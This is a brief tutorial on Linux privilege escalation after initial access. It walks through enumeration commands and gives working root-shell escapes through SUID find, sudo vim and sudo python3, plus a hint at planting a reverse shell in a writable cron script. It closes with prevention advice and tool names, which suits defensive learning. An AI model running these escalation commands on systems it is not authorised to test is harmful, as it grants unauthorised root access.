After initial access, attackers attempt privilege escalation to gain root. Understanding these techniques helps defenders harden systems.
Enumeration
# System info
uname -a
cat /etc/os-release
# Current user
id
whoami
# Sudo permissions
sudo -l
# SUID binaries
find / -perm -4000 2>/dev/null
# Writable directories
find / -writable -type d 2>/dev/nullCommon Techniques
SUID Exploitation
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for exploitation
# Example: SUID find
find . -exec /bin/sh -p \;Sudo Misconfigurations
# If sudo -l shows:
# (root) NOPASSWD: /usr/bin/vim
# Escape to shell
sudo vim -c ':!/bin/sh'
# (root) NOPASSWD: /usr/bin/python3
sudo python3 -c 'import os; os.system("/bin/sh")'Cron Jobs
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
# If script is writable, inject reverse shellPrevention
- Minimize SUID binaries
- Restrict sudo privileges carefully
- Keep kernel updated
- Use AppArmor/SELinux
- Audit file permissions regularly
Automated Tools
- LinPEAS - Comprehensive enumeration
- linux-exploit-suggester
- pspy - Monitor processes
December 2024